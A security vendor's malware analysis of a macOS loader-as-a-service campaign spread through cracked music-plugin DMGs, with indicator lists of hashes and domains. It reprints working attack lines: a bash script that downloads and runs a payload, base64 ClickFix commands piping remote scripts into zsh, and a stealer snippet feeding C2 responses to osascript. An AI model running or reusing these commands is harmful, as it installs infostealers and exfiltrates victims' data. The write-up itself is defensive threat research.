-1.png?width=64&height=64&name=Untitled%20design%20(18)-1.png "Calvin So")
On February 4, 2026, security researchers discovered a mass-distributed loader disguised as predominantly cracked music plugin DMGs used to deliver multiple multistage macOS malware, such as Odyssey and MacSyncStealer, in addition to a Mach-O binary containing another loader to an additional payload.
The malware attempts to run harmful scripts immediately when executed. It also uses a 'ClickFix' style attack via browser pop-up to trick users into manually copying and pasting malicious code, potentially re-infecting the system even after an initial compromise. Researchers believe the potential of this is a loader as a service (a malware distribution service sold to other criminals) and is part of the broader Pay-Per-Install (where attackers earn money for each successful infection) ecosystem targeting macOS users.
Analysis
DMG File
775dc2f44ce173a67f77ba6b30f354495024078f5d4626fd02ae5bc9ea438705
Threat actors utilize social engineering to deceive users into installing malicious DMG files disguised as cracked music plugins. Although the DMGs are unsigned, the social engineering lure successfully convinces users to attempt to execute files manually.
Within the DMG's Installer directory, researchers identified two critical artifacts: a malicious mach-O binary and a bash script. The latter functions as a secondary distributor for 'ClickFix' lures and additional infostealer payloads.
Installer.plist
775dc2f44ce173a67f77ba6b30f354495024078f5d4626fd02ae5bc9ea438705
Security researchers have discovered this specific property list (plist) configuration embedded within over 100 malicious DMG files disguised as cracked music software. This .plist, housed in Installer/.Trashes/672/Setup.app/Contents/Resources/Installer/installer.plist file acts as a hidden configuration script that instructs a background process to communicate silently with a remote server at mac[.]fleebottom-33[.]xyz. Its primary function is to transmit campaign-specific tracking IDs and retrieve secondary malicious payloads or instructions without the user’s knowledge.
While the command-and-control (C2) domain mac[.]fleebottom-33[.]xyz is currently inactive and does not resolve, it likely functioned as a primary distribution point for secondary malware payloads.
xml version="1.0" encoding="UTF-8"
DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>silent</key>
<true/>
<key>metadataURL</key>
<string>http://mac[.]fleebottom-33.xyz/launch_mac.php
pid=PPIIDD
tid=TTIIDD</string>
</dict>
</plist>
Mach-O
0f5751f207e4825950e476dba2c42548645aba9b680728b57c18ce077b2aa4cf
The x86_64 Mach-O binary, titled “Meta Installer,” resides in the hidden directory Installer/.Trashes/672/Setup.app/Contents/MacOS/. While many macOS binaries use the FAT (Universal) file format to support multiple architectures, this specific file targets only Intel-based systems. Consequently, the binary fails to run natively on newer ARM-based Apple Silicon devices unless the system utilizes the Rosetta translation layer due to being x86_64 architecture. During execution, the installer parses the Installer.plist to extract a specific URI, which it then uses to retrieve additional malicious payloads from a remote server.
While social engineering attempts to entice users to manually bypass Gatekeeper, the 'Meta Installer' Mach-O remains subject to XProtect's static and behavioral signatures. To circumvent this remediation, threat actors have pivoted to multi-stage execution chains, leveraging obfuscated shell scripts and ClickFix-style lures to execute payloads outside of the traditional app bundle structure.
Mach-O retrieving Plist metadataURL key:
Blocked by Xprotect:
Shell Scripts
Stage 1: Bash Script
753aac214568c5f388488fb2d28b872de26faa3fee03d723b8401a968984cda4
The infection chain utilizes a straightforward, unobfuscated Bash script located in the Installer directory to facilitate the second-stage payload delivery. By gathering the host's operating system version via sw_vers, the script constructs a request to the hardcoded C2 domain com.airportsock[.]xyz.
While parameters such as tid, pid, and filename vary across samples to track specific campaigns or victims, the ORIGIN_LINK has remained a consistent primary indicator. The script downloads the payload to the /tmp directory, grants it execution permissions via chmod 755, and executes it as a background process.
Bash Script payload
#!/bin/bash
OSX_VERS=$(sw_vers -productVersion)
ORIGIN_LINK="http://com.airportsock.xyz/972a8252-157e-42e3-baea-a42eaf04708f
tid=56936259
pid=3942
osx=$OSX_VERS
filename=Download+iZotope+Ozone+Pro+v9110+WiN-OSX++Plugin+Crack"
downloadPath="/tmp/"
{ curl -L $ORIGIN_LINK --output ${downloadPath}init
chmod 755 ${downloadPath}init
bash ${downloadPath}init
Curl URI formed:
http://com[.]airportsock[.]xyz/972a8252-157e-42e3-baea-a42eaf04708f?tid=56936259&pid=3942&osx=14.5&filename=Download+iZotope+Ozone+Pro+v9110+WiN-OSX++Plugin+Crack
Stage 2: Fetched payload to execute
5a7b4282695da750736ca5eb0ef38b8374339a9d4407e7ecf0ac7e4c8da20a31
The secondary stage utilizes the domain robincompany[.]xyz as a redirector. Notably, the URI includes an affId=1000 parameter, signifying an Affiliate ID. This confirms the campaign is part of a broader Pay-Per-Install (PPI) distribution network, where actors are financially incentivized to drive infections via unique tracking identifiers. Following the redirect, the script decodes content via base64 -D and then executes it via zsh.
The deobfuscated content does a curl request to ballfrank[.]today via switch -kfsSL to silently retrieve the MacSyncStealer payload for Stage 3. However, researchers observed a pivot in the 'ClickFix' social engineering lures: while the malicious commands remain identical, the delivery infrastructure alternates, utilizing kuturu[.]com to serve the same final-stage payload.
As of the time of writing, the distribution domain ballfrank.today is currently non-responsive (Cloudflare Error 522), suggesting the backend infrastructure has been taken offline or is intentionally rejecting proxied connections to hinder automated sandbox analysis.
Stage 2 Fetched payload content:
open "https://robincompany[.]xyz/index.php?o=506&source=filecore&title=Setup&affId=1000"
echo "Apple-Installer: https://apps.apple.com/hidenn-gift.application/macOsAppleApicationSetup421415.dmg" && echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlcyBwbGVhc2Ugd2FpdC4uLicgJiYgY3VybCAta2ZzU0wgaHR0cDovL2JhbGxmcmFuay50b2RheS9jdXJsLzljZTQzOGYzYjc2OGMxZmEzMTgxMTc1MzExMDQwZGEwZmNiNmE5OGM1OWY0MjA5ZjgzZmNjM2MwMDJjMDlkN2V8enNo'|base64 -D|zsh
Decrypted base64 payload:
echo 'Installing packages please wait...' && curl -kfsSL http://ballfrank[.]today/curl/9ce438f3b768c1fa3181175311040da0fcb6a98c59f4209f83fcc3c002c09d7e|zsh
Clickfix browser populated pop-up:
Copied Clickfix content:
echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlIHBsZWFzZSB3YWl0Li4uJyAmJiBjdXJsIC1rZnNTTCBodHRwOi8va3V0dXJ1LmNvbS9jdXJsL2VmYzFmODE1M2U1YzAyOGUxNDQzOWVhMzg4ZGE3N2Q2OThmMWVhZTdmMDA4MmY5ZGNiNjMwNWU2ZGJlODRiYWN8enNo'|base64 -D|zsh
Decrypted:
echo 'Installing package please wait...' && curl -kfSSL http://kuturu.com/curl/efc1f8153e5c028e14439ea388da77d698f1eae7f0082f9dcb6305e6dbe84bac|zsh
Stage 3: Infostealer payload
cef9159155222472a198ccd4e18ba6df965e75d3f23e9e8e968e963ce75ef8f0
The retrieved payload is the obfuscated Macsync stealer variant. Once deobfuscated, the script fetches additional payloads for subsequent stages from kuturu[.]com and executes them locally via osascript. It specifically targets /tmp/osalogging.zip, attempting to upload it to the attacker's server as a single POST request or in managed chunks before deleting the local evidence.
Retrieved infostealer payload:
Snippet of deobfuscated script:
#!/bin/zsh
daemon_function() {
#exec </dev/null
#exec >/dev/null
#exec 2>/dev/null
local domain="kuturu.com"
local token="efc1f8153e5c028e14439ea388da77d698f1eae7f0082f9dcb6305e6dbe84bac"
local api_key="5190ef1733183a0dc63fb623357f56d6"
local file="/tmp/osalogging.zip"
if [ $# -gt 0 ]; then
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token&pwd=$1" | osascript
else
curl -k -s --max-time 30 \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
-H "api-key: $api_key" \
"http://$domain/dynamic?txd=$token" | osascript
fi
Conclusion
This campaign demonstrates the evolving sophistication of macOS threats, moving away from simple binaries toward complex, multi-stage "Loader-as-a-Service" models. By combining social engineering lures like cracked software with "ClickFix" browser prompts, attackers effectively bypass traditional gatekeeping by tricking the user into becoming the executioner of the malware.
Iru Endpoint Detection & Response (EDR) automatically removes detected threats when file monitoring is set to Protect. In addition to standard file-based defenses, Iru EDR actively monitors for and blocks behaviors associated with information stealers, ensuring your devices remain secure even if malicious scripts attempt to execute.
Indicator of compromises
DMGs
02824de8aa75504d2e7958a67d3541c89af4031587247d44c79dea1554eeede5
02a2f0957229e68ff03eb2dd4efa6831a1beefe9e8fc4b4481c4194c6a0052ca
c1546958a51022647c932bf006e1817b39331dff60b33c99bd374bede0e48b54
47f8c34f744cb16ed9759a60c01e1e8072ea6cd23d1eba3c55449cb90898809d
3e232e216478efaef315040b9d98a24e1e4401cbaee691a6992dc6a2ea716a2b
5df1d3be42e911d3e2b8e6f53fec04f6b49d8c87d78ac0e702d4af1f6010a25e
cd8ff4618131df56990de265b82ec827f9451b6aa2ce545231b076cc615c87f1
006441b6f5f8c96ab4ba773764454023bfa06c377f79f6e2e4b3d2fc00fc89f8
890e5bd56e688107250260d8cfbf3ac3cec822cfe7150e22da9cf60c3848d81c
9142f7a7e879c58cd195ba109f01dc0ca13c7eea911158dfa485824ed984688a
fb21287c3aa2522b16ca4d0770c732407178ccd5c10c4cb61c30a0bde9041305
818f3882ae79ab44d0dce2121283c5f7c3128770b1edbb31dedc7e4d58bd05b5
627c7b1dd33a6257820a2e80b640b00b6fd931ed2194e68b5c5fa2ca138e4634
4f06edbfda1fb615c5423ed030dbfd7a241daf570b1a2d256f03900c3195361b
f030e32831eed474411eb86c6d3340bad6e0f6ecd4105bf2a1fc802584fa4a70
be8e2573ba6dafe8ed47b5ddc891b6355ceb708b8db3c160921bd02f76208507
29fb28dd2aa34578f814660f18be015a1a8fd917aeced63ee995a4976f2427fc
2f0c736ced7f4752d77bd3d8cb37ec78ff808e79d4a693254f8d452951864712
af8bc7931ca8e5f0514780db03a7151a789c63547c6774f42c3d3cd4dbfd57b6
c440cfb1b8b5ece6012ed6525e166c241c993a081076a571bd49341a44bc1bed
1438aca382e8be3addc8a2468fd68021eecf5100aab758bb129b7f4089f4ca53
4550278bba662211129537700718d8fe4bbbf4d1779906b126f5b1d8ea68e9c9
d8ec1281f99e2847f5e21cc70bc436777531ee91502e244481cca78730ce7883
a39f455fdcdc172c56f10745295a19c99f12576ddf021a2078d05d3538fbbc00
b55d4cad689ed8e7bc635b343aff066f673242abce3e2cd6b80f812faec847a4
8798dd4d6eaf9aa6a2658a7b0f8cb821d06f0c52df3040b00fc9cb77cca3c8b2
0524a828df14ce9f557880f4c1c7877c4d60805c49614f5c281a4a0eca968fe5
c6548fa558b7132608dbea9799d37bebdb6d2627eceae55b4f5fb240ecbc5a7a
e9b283a8323a1cd39abe2a8a70e6984899101d91dff859d0ea2b471ec9a6367d
9d98aaa2ca7913feff06a083b5ca365527da30f9aaadcadfb9b7fa5be131532a
41ff9cbb3e0aae1b1eaa2e450bbab02f38c57ced3def53206e45843f067dd919
f82813df9fd8f7155f2fd79668726b0c20e138f8af65ed3066370205ad62a7e1
3d72cbd048f84adbf10d2fd671d6f8caf8a8662ced9f6a54965646b8538e78fe
4561ca21967615a64327e41d2920bd5defb500965b4ce7552e028b324f76a64b
00bc1123ce8f7abc46a7cbb2b0f94b15ada6070ad8aa88ac1e112327e5cffe24
Downloader Mach-O binary:
0f5751f207e4825950e476dba2c42548645aba9b680728b57c18ce077b2aa4cf
Plist:
775dc2f44ce173a67f77ba6b30f354495024078f5d4626fd02ae5bc9ea438705
Stage 1 Bash Script hashes:
0fe8540c8ce1de66494a8330dd7f8715fe1048dc038a746cbc8e141222db7aca
fe6e5f076aae76d83a6caed2f376dc9549455f45813aab1e09f8d88e9a485adc
b2d5e3ab16539387854c33376ee85739326b5974b78d9ea6d07b80f264d8f40d
cf8fc13b62f3cc9f5ed77f6d3d7da47369b82b4bcde98b46c07ecf8afa873708
102356fd81d090096a54181fd70f68dbe139ed343bc436a13ddba0a3e329c34f
eb0bfa42aaf67165d1f4c7d4c880852b595c95b36522bad168ad374b83e8e2f1
839dba21d1f2f2188a805c62c966299f5f7560ad4276d4fa282d154a4dc58e8c
c3a99e55fd9540cf39b0700e8477d145379b6a0cf9d352c219886bae59a9daed
dc44a0ed9f4ca32d104fecca206799a838770160810c1e05eb6190f5e15b7bd2
8c2ac2ff1b60d76716ab472f880da1fcec551e1d856d878c403d663e7e754236
275305c05f50f78225e00c01c83e709baf8ce85416499d3f4dff953b9342ece8
79e4aef4d83e92a87c172f031c65742af6b5a234d2f5082863a9d867438544c2
1e4acbe0f35817076da62d9cbd357a2268a546bba5b809413d2aa0796fdd038c
31ad3f8b0dc1cf58f496a6796617d1f5721fca048cba26e79da1edb5153556d0
c68038390b8e07693d4f45f6fa37a33b7f688015ab70ebb077acbd8a35416347
0f1f3b724235af2d84831d747bc8787a2af0e87db2cb2729dd978ea88f83b91b
aa4a952a27f453e8647a1edd5a98221b43a0d6bfaa62e726836b1cdc148a3d6a
5f58d4a26b652170a96954ea8dbde2f9ee8846946ce98f98d4cceb20420d01ea
ad5fa31ece8f173bf09b5b608d5fc13a0479777fc4a853ef2769e74c626ca6b7
f34c1eebb72004fd7e8fe74e531b0246d3df46c30d284b1dd300cc3dfc2e455b
6a42622f95d28c0a029239e921c1382390e2752552927ecebc3556b5c4d5965d
a941d85c17cac94b9bf8c9f315be97e9d6c2bfbbb456d0dab7cfe896ed127737
99fcb26e859c049c942a34067f3e0508f350e1b485337c78b3f06bcd0a51aab6
13ff96661288165623e66ec4e67e8239e0ff3be19fb2d77565878658126e6861
0c3620513f6cfbd48e28072ad1b9bb016e29abd8141672ac84f9368a1b19af77
b7a1fd6ce093354b95a51ef2afdecd5c274d592dd3dc53d160a7fa18d6b4049a
b77f18598f9e27a78f23967fdb77b882a4c79787c7952f17339d3a34aaf65d0d
47d47ed11255759681fb34783532f4e99fb32906acc170da4753b6a3cd53b29f
753aac214568c5f388488fb2d28b872de26faa3fee03d723b8401a968984cda4
209d4bbe3a8b754247aa5651f6f22780bb2b097c0e3d2a4d856fd8536eb4eccb
0d301ffe3daa7d1b4e85cdb061c57552251b4e9a52b8577f6f16dfec4bdbbcff
14022cd45d35153038ef803e56bbf900f0282a39ce23bdfdd0a9b41c8e3f75a2
5d4dbba45e3f1705edc534cd3fa8b4d87508ae54abb8c7d2a8f10b12187f4bbe
bc96b2b3d6d900bd65f836753dc9400a3c5a4dca75f3c58275c8bf7cdb3a7168
18222f4059191a49d2d857f06033608dd76e9dcec47edd68db5e0da6e11b5be7
eeb2b987e1a211d24530443221cebb052fb7364cd7be848b8aa7b3130057c866
9e7dcce86f232a65b3427a46221ad86f21f81adef9794fd113aa5a9022df2666
f019dba22c8105ba91f2436cb2a4b1c71cde4a7b4f1cf6fdd214f1a72c1cbcf5
c7e70ce7cb680a68d52a66fdd54d0c22d21686f798182976895d0fccb106022b
729abbbaed1c64b3c020b289c9ae071b29a08520ed8240203b0bd182066522a0
4a36c191e15ea43a55ed85e91b2804ed1687d90b4d97a012e4159ed5beed1f00
e3e422a6f1fd399b7820d4088f4a3de7b19a0f193013dd535ddf3a923e1fd15a
dc28d7c5fdfcef5e8049a1c4fdb9c168a42ce7f916e7448c52385e51b4e20b3f
ada028b144f3c8a856303e9930adf9f1b59f34a04ab123ffaedf64f3edb3f2ef
4e1042d0fdced5d78e65790e7311e21adc03ac073f2deb0b2f4a9d937110a58f
261b2ba545944babe9e74f185d32ab54543cb5ff91c8991ebea9d8e9c10bc7c9
b4132582a80aaf993f1f0c0c7bbd3a9b318d066376f8ed9a3919f2ee1abcba32
a73b0f553f289fab5e62cdc4954907aa2b4662f27709c05608631ebc140952c7
970de316b6af0ff7600336be9fc5bb0db59a8924c9527bc8c5ef38f6fed3b368
f7662ba0bcab3e2e187071afd928acff38ce58f9990f58509fabeb7f2986ebe5
Stage 2: Fetched payload to execute
5a7b4282695da750736ca5eb0ef38b8374339a9d4407e7ecf0ac7e4c8da20a31
Stage 3: Macsync Stealer
64068d0b7fbef87a7af91834ead9bc0efa21f814b9e6a945b440db75bbcfed76
2024f704b123b9bba8f6a51b4403af85c789b3c71bf51bdccb133fd7e635f812
b03658a2893c8860c799df3e9a3d031defeae50bb1f28c41d4b99871cb6f0076
50446301c5900fbf5a51108d9f37ac0da827ef1f35377cfbfc4d35b6cab0f0dd
093c7186baab476de23bb39dff5a591ca4f551d8c6695029780203865fe03f0f
a757ac99e9ef9d6497a685059b4c389c9c35deb705348ddee83d8fa61913252e
b96cb73a7e051d4206c8589bd6297a3cccb1fdcccc4c918313cd03189cd38341
a2009beb4ef41c5ffe81bd89921f9311a89e260d9424b61fd0cdfa9d73ca42f2
4e632566cf0a536bfeb6887608daf749953ac541123c276f0e4f0715e23d1dc2
924336fab9e7f0c1527551d69abf40d203b58b1394ed7e541db74b8b41d86470
e59378642b40af2c68ae225500f74eb6413a0da3f00b81413298dfe415184919
ac012808059775238fc8d924d6b79115be5b04575447c9d337e36d380cd7bc7e
cfec1c5f29c13411dd5bd7d6c06ce0bce36fc24738ae43cbe16b17489e179bb2
59248ca59647d92e2aed09746a2d7bb302ed8e106d6086cb1c1ea5a2151b24dc
8cd40e53285035d74bbfaf191d0edabf5c1450cc45e5f03acbf3d4f15fb8befd
3554873779975dc41f69fad43f9659b1402db2648cba8e81e17a8a5ea71568b3
ace876938538b87f89236e68d8b697f71587f3f9ad8f6ba2d1457a52f26b405e
219e0677853b7c817a8b145cffbbff80f3583bff405634050b442949e3b8be54
61215565acd7c4350e7041dbb23238d2751602cab7d0f42173b472d734fd33e1
0b1dc65e2403c56c0ae0aab48988a1d497fcc33d42f65b6c7d8a3a5febaafc3c
05a995a57bcfa0083a95ee8e17b01d94f4ef00079a2eaf101fb1fd6f43da0eb6
0f9782df94b3d431806fd8ac4ac346a6d755bd76b0010c6bb0db9a3e557be51d
f4c7a7c02bdc3dd4b4c6892f7931709e331eb0a3b1f8df59306632477f0956a5
5e3aefd7668cb5eb4da18b1040847029dddb55096a922658633bc85fb5008b7a
d0b3bb9c131adb9890b26ea183070a826b8c5d314fd014fcabc669156d8aac9d
380a18372968f7f07c744604ccede3e10a90693c4e3f05fffd3d01db5433e366
6384f618437fe5d16b04a575e6fffa65e1f68ea93bdbebba50de50fcf7e6520b
f492720327293cea451fdd0007915f6fe408c9aa2acb6d85c4bcf4c81a2d9888
1a663865c2b621a3121845403b393ae1381fc8ec8754cbfa70efd2808603c214
29d17044cc78cdea6de1be336c96ae843edd6a9cdade573a12ef8c1cd573c8c4
f39da38a6c868a32a4512c0daaf0a7818cd78dd6aadc2f2c879a3b495398bd15
20b538aaaa699c21ed5e492bf252eade8b68e804548c7039281f04305c00bf8b
513d5ad24a89efb3494d3dee155b8d7b34abd1360daa5182f0c5b177f43d6637
539a87d1f9c1dec9397808a5759e04772369164945455a30c42b64e87587cecc
41dcd8fb4c2fd6c4997c2cf72c190f40caf16273b2184fa48d50e2d775093cc2
64c9dea35458911902cb6012973fbffe058d8f75cbff3f3e1fbcdbba413472b5
ad10b8843809c2626e77955c2bea7df620bc98cac5e78cd72a3a5cbccf1465d8
9238e0e014aadc3e7100f442ee23ebb00b4f5237df18360a60470b46ead813dd
4a3ff5671485ff977e4c9872e84a8a3c6cd7bbdf69116b79beac58dbe29a09e6
496f6b5a7e48da752ff82a21623aec4302c77240b183aa489a60ff25e34643ef
2a8aa226d7d987beb036d0f0d68a09a40f8435e78abd0c2281ec0144614022a8
7acac2668c8d8975e90f5a8526cdeea0e98c23d866586dbb6776f57806782c94
1e520fe39b3264dfade7c5d815ec93a6ec8433ac1dffd9d2eb731fd83d6feaaa
92a30586d877156592f4531a7e15aa2c56732aabc278a5a7f349e20a324f1ff7
4e6efc60d2809d17f05024b70a788280ba26ff6d5faafa0237771caeeba79b5c
5c48eb3be6bd1165604b6d4796c46ce7a18f5a5492a7d7a3363c6c2628fd2d12
bd02c73dbc5e2f0419bf1d8523a8bedec8ae63527220d2dde7c2172c10755e3a
f0870d1a62041aeaa2a7c917f21e087f1e8386575f58249371aa1a2a33ed9073
4bb18ae6081c7cbe4bc7e0237b68dd643b08d6e4a62ee70d422fa918fb2a5611
12af4abb0bd394bded4410dfb239a9a0be02bb16c4489764b07eee72f5316602
03a0c96f035ada1cd247e639482006347a57cd4da275bfbfbb0022dcb5589bad
2a1631b41fde583404f129e5a6fcb143d526f844f3269eb322c6d9a64e690493
57840c740eda337d8a1f6ea83e3fbe1a311c169f8b59abe36c4960c11d6d6fe7
14285ac74a3e6de1720e7bdf5cef243b3d455c70da5f22715ff52d012abec8e3
930344cb866e02cc97a5d164fc34e853882764ae58f50137660600e5f56f738b
ba1ebf53db3e753f23d32906e925abc01583138282f90396c2cfed0a30145ae6
b9743a18ec6ffb0a1ffeb7c8488e30aee7a73344624ff8629dad749d9e690b8b
a0c38cdb22c6062238f4a4164283595590991eb4e6e2c7207f6b5af799357ffe
9867399585820e9579c646d2ba1bd79e5cbb6722449708cd44303274f01b0099
06e97d8b715a04954f80f5090a03627be898304d7f33c8026b0c18614bccab46
3eeb19bb7af39decc6789536ca7facbc83cfc6a09af8f0796194a6e4a53eca04
9db3bbb449813f331b023d9c23347e3232823eee3eeea57ad7527514540518b9
558c0bd826317895b86f9af5234a16dcbb9e8ef339240178de10ddf055721302
8c319f5500674128e91935011aa179ce563a5d0da1d959ca3136c580c541f050
3270a414cae296be4fde7a0ae97e9334aa780df21f5e4510cc1313ac701a9da8
9cf9387088e71e5ad17b7d9d2d14640d216edec3a2f309691dfb6259c02562bc
04af1bd4b6f7ddd0a684f58fdd4275c67b9e66349e8869fdc731088858f890b4
a1f04ce0d44dc1d4db52e2194f3ecc6112b0361b35441f32024a7e908fd02d18
d2a606581e84918b1b03dc1e7498d63ddf399aee8ab2bdce616e1661eb5a79f5
2d8c61608162a9ba71f9e9e11bd702869b884c25a2a54f4573176ab9a2904b85
b474be77c99fecee82d8242503af1c85789b7623b8813dbccd8b8099eddbf11d
2bc16c40dbe8e462cb665ae529032b27900fc09f5b74c501b80111de6cb7b3fc
b0e18e9e92ed538b01d5f5d2ee58aac6d5e98c7352098c709b953bd421ae50e6
2ca8ff51bcab3f260af02d82b186d6fbb696aa08c699bfdf80a95730752e4fe9
7eba8e3237f614acffc5e736f57fb2eb6c60d14988f6707b671952a88eec63c9
e24963a11c7338577488a99873275ec8a45cb7e0c6e1a72ec61a6d7474183ae3
269a129f16531baea5f2849171a68d588fafc7dd471ef91767ac9457009cfcca
491ac4e25bf137199889ad6eb84c21358eca6cddcf66215d1dd93f6d4a281ce0
7c24fb87782861620e8da2757b1f21b315fbb9ac757b4d69c1a4d5143ed395e5
1c92ac0ac04f33d6cbaf5be9588e01e9163a3e01f2b4b443a2f258bdfa5dafb0
93449dcf4b1cfc477746b1b754d145a296f8e6fb5bc07264188fbac7445b5e15
47663a7704ffe36c270ba206b920cad75e6ddc20a3880f62f63b1567bdacf16f
85bf0d79891344826ad8fdefca9570cc4674dbbbfd827f43dddb972a24c68646
7027dcb7403fd0565a13accea169601ba308058da4c4e6de384e1e9e8b965693
311fe766513b7428f7039cc1d0ea3f49a86870f24bbf49b482dc127be0ff5300
db172add02c083e39cf83d8e8226f760184e6edecfaefba6c4c05afb4c7be7ff
0d7eee09704aec3ca6f5e30ef41ed1d5549418bcfdd0e361808f61026484c4c6
691718fedbe6d30904ebb786c8740f725f1b7ef4d980f748bcd9de119160e4d2
745db959459d1d005b375e787cbb8ee355ccac16565e4099a07a765770918e8e
d7faad8970de810066f4aead3f64c350f29d6a34995f2f86c6f8962ead5cedf5
650bc797b00751fe300806209e020cca8c9212ebbc69ce2ae1dc5e801c9a284a
bf50358bc04846c2d73c1825ac393143766105e1cad25fe49b785616c0fdc408
d5ffe817680f1d7d9c3e35a2a79981afeabab7da249cd23b7026ae9b1c79d793
2aed362ee37b092f5e0a1468971c45a715d8653e6f7dfcdfe60cd3c4e5a43112
40f3d805b0c6497eaee29c126aea67fde15240975db3e018d0847bc105601780
9e6a28b25e7b6fec10c14b16c74c0d38f718320ab5e980c432851e1b92442692
59e7ecbafa65d90d0d8541c368d91643addefac83ac00696f0434c7547a68a75
3fb609b1a54658dafe11551ad886073c2d50bb7b1752a116ebc6738d71b8ffc2
375bb2ea42fb2f959f0aa5c05a927f100aa9a704ce9f2084fe9269cee49b48fe
4f325366ac906fd62e4336c371fac8f54a7da9e834c2af189b8f0951f6f8930b
ecfd13de38e1901c32655d9c1cf54b24a62d83ad5f49c7e8ae8ad2e6c427cb00
35e66b12b6c346f77156394b1135178520263abc6692b5828fa8e35916e41edd
d20c67016dfe791bdde705bd31b730ec3d967274dd4172d1c840c976ceec8d3e
f9570767a741f0d6f6446c4f1ae3b7e8b7c0c9c7a8f448ff084020249ae47c05
cab3710648133ee1eebb02994cc54a5ae6aafcba1faccbd08d481f2d27543628
d27474842c4ab1983ac5e274ee7b7ad6f6bc50353ca650af5f6362d97a014327
7f54c4b031c7bbfa534347fa2831e5e140d2577b0c3869df008706bfe94198e6
e8bccc40346b9d46b2cfeb322ec77230a5c31cf3d04e1b4160a7e049390cb319
5d03859b50496bfc7fc37e49893c30c9b367368c357a1d8e52a3d8d6fb064ec6
5c533f8d6ad9e5c9c6915483764faaa33df4b79bfc8ee21285106fe7b7cb4168
dc4d9ead44ab1b01222b3c191885330bdf641930980c43195c4ec568f7eadd69
94f29e682f80358a32c6183260244a33932c09d2ebefb69c4e0a53b1edb8b66a
ad00067d7e167220162331def9993691d9917ced17d9f4757aa3fdd38f861fdb
007034737725b4537efd35585b7e0f3751f641b0c7ef1495f1817e0c9b26842b
a67f3a954da42a285545c935c5c7b818ac5364359c9059b86a29c68a56b80d18
985e78a9173f6075bf575e5f0db356040e711b265641bb69a9e0a030c47f9a68
fbaddcfdb4a308f943515f2cd6688bc7ea825bdd53c217e7341c41b3ef74d8ee
33aedb5c5fe722202c0fc247e4c3aa067f444b27e28b8efca506da3284b08439
c38864e05392265f9e63a823c40937aeb5ed41a2c702b190b46e7ad6aa902288
c883a664028e7db2457fff808a4d421e6c89b2bff4d961f188c3811b2f255d43
fe0962e6b9d22e28c614d4ee548110bf27ad7e75e65c882a9f0cd2c9eb28a61c
4b3e8963514f798d3413639f82873e94fd4ebd1ab1b481876fd93153ac789a52
3a06b0abecb7bddde34b5c9f768ef9b4aa79701cf4695f4252d33e07a158c27b
7108eae2fd0c6d0b8d62c087c4603936dd559e045c82a7ba102ebf2b7a0f1b26
7c4cd8d59181b729236359d5d6eb9a7ecdb7d8860a83904c5b3b6221594626a1
f809e0a681c6d1723d163e88de27fcd4677774d437b8eb8856bb2fb14b370796
a6b3f55ec903a516f3897ae25974262c7e93a7960fe584751b2cc542ca74edbd
cef9159155222472a198ccd4e18ba6df965e75d3f23e9e8e968e963ce75ef8f0
Domains:
kuturu[.]com
Bombauthority[.]website
Airportsock[.]xyz
Robincompany[.]xyz
quiltpin[.]xyz
trickflag[.]info
ballfrank[.]today
a2abotnet[.]com
appolobase[.]com
argoflyleens[.]city
argoflyleens[.]space
argoflyleens[.]world
ballfrank[.]fun
ballfrank[.]space
ballfrank[.]world
barbermoo[.]xyz
claus2doom[.]co[.]za
claus3doom[.]co[.]za
claus3doom[.]es
claus5doom[.]es
elfrodbloom[.]space
fbnmoon[.]coupons
fbnmoon[.]today
fbnmoon[.]shop
fbnmoon[.]space
foldexmoon[.]fun
foldexmoon[.]today
foldexmoon[.]xyz
folkband[.]fun
frolessmoke[.]co[.]za
gonebornes[.]com
groovyfox[.]fun
groovyfox[.]space
jmpbowl[.]space
jmpbowl[.]today
jmpbowl[.]top
securityfenceandwelding[.]com
Sestraining[.]com
Trickflag[.]info
ultradatahost3[.]baby
Autosalesknoxville[.]com